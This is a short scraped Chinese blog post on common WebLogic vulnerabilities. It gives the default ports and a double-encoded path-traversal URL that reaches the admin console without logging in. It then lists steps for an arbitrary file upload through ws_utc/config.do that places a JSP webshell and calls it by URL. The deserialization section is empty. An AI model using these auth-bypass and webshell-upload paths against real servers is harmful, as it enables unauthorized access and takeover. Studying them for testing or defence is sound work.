zoukankan      html  css  js  c++  java
  • weblogic常见漏洞

    前言

    weblogic的管理端口是:7001

    tomcat端口:8080

    jboss端口:8080

    端口可以改

    一、未授权登录

    进入登录界面:http://192.168.18.45:7001/console/login/LoginForm.jsp

    未授权访问漏洞:http://192.168.18.45:7001/console/css/%252e%252e%252fconsole.portal,通过这段代码不用登录就可以直接访问,

     

    二、任意文件上传漏洞操作

    文字叙述步骤:

    未授权访问路径:http://192.168.18.45:7001/ws_utc/config.do
    Weblogic默认路径:
    C:OracleMiddlewareOracle_Homeuser_projectsdomainsase_domain mpWSTestPageWorkDir
    我们改成以下路径
    C:OracleMiddlewareOracle_Homeuser_projectsdomainsase_domainserversAdminServer mp\_WL_internalwstestclienti7n5e1warcss
    木马上传上去之后,访问方式如下:
    http://192.168.0.127:7001/ws_utc/css/config/keystore/1604376329959_whoami.jsp
    1604376329959_whoami.jsp

    具体操作

     

     

     

     

     

    三、反序列化

     

  • 相关阅读:
    模板方法模式
    组合模式
    JS API文档
    支持 @connect写法
    PHP word导入题库
    go 复制文件和创建目录
    go文件写入
    go 文件读取
    gin连接mysql数据库
    gin多数据格式返回结果
  • 原文地址:https://www.cnblogs.com/1996-11-01-614lb/p/14267500.html
Copyright © 2011-2022 走看看